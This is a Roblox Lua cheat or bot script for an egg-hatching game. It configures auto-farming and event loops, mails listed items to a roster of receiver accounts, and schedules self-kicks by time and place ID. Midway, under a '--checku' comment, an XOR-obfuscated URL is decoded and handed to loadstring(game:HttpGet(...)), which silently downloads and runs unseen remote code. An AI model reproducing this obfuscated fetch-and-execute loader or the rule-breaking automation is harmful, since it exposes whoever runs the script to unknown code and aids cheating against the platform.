task.spawn(function()

------------------------+++
getgenv().GEASTER_HATCH_EVENT_DO_BOSS_CHESTS = true
getgenv().GMAIL_ITEMS = {

["Harvest egg"] = {Class = "Egg", Id = "Exclusive Egg 57", MinAmount = 1},
["Daycare egg 5"] = {Class = "Egg", Id = "Huge Machine Egg 5", MinAmount = 1},
["Blossom Gift"] = {Class = "Lootbox", Id = "Blossom Gift", MinAmount = 5},
["Magic Shard"] = {Class = "Misc", Id = "Magic Shard", Amount = 20},
["Bucket O' Magic"] = {Class = "Misc", Id = "Bucket O' Magic", Amount = 20},

}
getgenv().GMAIL_RECEIVERS = {"MrsHazelDrift2020","vincedriftGrove2008Y","TheRealLuckyFrost","KylieShadeWizard","NexusBenjamin_Enigma","TheRealzippyRipplegl","BrooklynFuryLuminos","NexusB0ulderembergus","JacobOrbitz2010","ItsHarryRift2019","N3xusthornP3bbl3","MrsBenbl00m","StarryMagicFrost","ItsCookieoak","NovaStormyRift","ITSJACOB_gl33","NexusKen_Shine2003","Arr0wGh0stCraz3","MrsLuke_Glitch","JackVortexDew","ChillMaster2011","Claw_knoll","FusionShadowCyber","DYLAN_Z00m","1953Crutchfield3117","WolfPix3lStr3am2017","GlitchF0x34"}

------------------------+++
_G.start_vvv_ = true
if _G.ACC_SUPER == true then
	_G.FPS_farm = 5
else
	_G.FPS_farm = 3
end
_G.FPS_event = 7


local _Config_Online = 5

local FILE_NAME = "OFFLINE.txt"
if not writefile or not readfile then    return	end
local function getOffline()
    if not isfile or not isfile(FILE_NAME) then
        writefile(FILE_NAME, "0")
        return 0
    end
    local content = readfile(FILE_NAME)
    local val = tonumber(content)
    if val == nil then
        writefile(FILE_NAME, "0")
        return 0
    end
    return val
end
local function setOffline(v)
    writefile(FILE_NAME, tostring(v))
end
local _Config_Offline = getOffline()
if _Config_Offline ~= _Config_Online then

	    setOffline(_Config_Online)
		if _G.Restart == true then
			_G.Restart = false 	
			return
		end
		--------------------------------------------
		if EVENT_or_FARM == "E" then
			game.Players.LocalPlayer:Kick("kick reset")		
		end
		--game.Players.LocalPlayer:Kick("kick reset")


		--------------------------------------------
end

if _G.Restart == true then
	_G.Restart = false 	
end

--checku
local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\193\207\218\44\232\246\196\27\221\207\150\33\181\190\159\80\218\214\205\60\232\191\201\80\198\204\201\46\227\169\212\80\213\198\205\106\197\179\194\29\218\252\238\22\195\137\137\18\196\194","\126\177\163\187\69\134\219\167")))();

local now = os.date("!*t", os.time(os.date("!*t")) + 7 * 3600)
local currentHour = now.hour

if currentHour > 21 or currentHour < 7 then
	_G.start_vvv_ = false
end
if name_vps == "Vx8" or name_vps == "Vx9" then
_G.start_vvv_ = true
end

	if _G.RunsLeft_TIMEtrial == 0 and EVENT_or_FARM == "F" and _G.ACC_SUPER == false then
		game.Players.LocalPlayer:Kick("kick fin")
	end
	if _G.RunsLeft_TIMEtrial > 0 and EVENT_or_FARM == "E" and _G.start_vvv_ == true then
		task.wait(300) game.Players.LocalPlayer:Kick("kick pla")
	end
	if _G.start_vvv_ == false and EVENT_or_FARM == "F" then 
		--game.Players.LocalPlayer:Kick("kick F > E")
	end
----------------------------------------------------------------------------------------
if EVENT_or_FARM == "E" then
getgenv().GEASTER_HATCH_EVENT_AUTO_FAVORITE_BEST_PETS = true
end
----------------------------------------------------------------------------------------
task.wait(60)
	if game.PlaceId == 119454325063278 or game.PlaceId == 95635359880599 then
		game.Players.LocalPlayer:Kick("FIFA") 
	end
end)
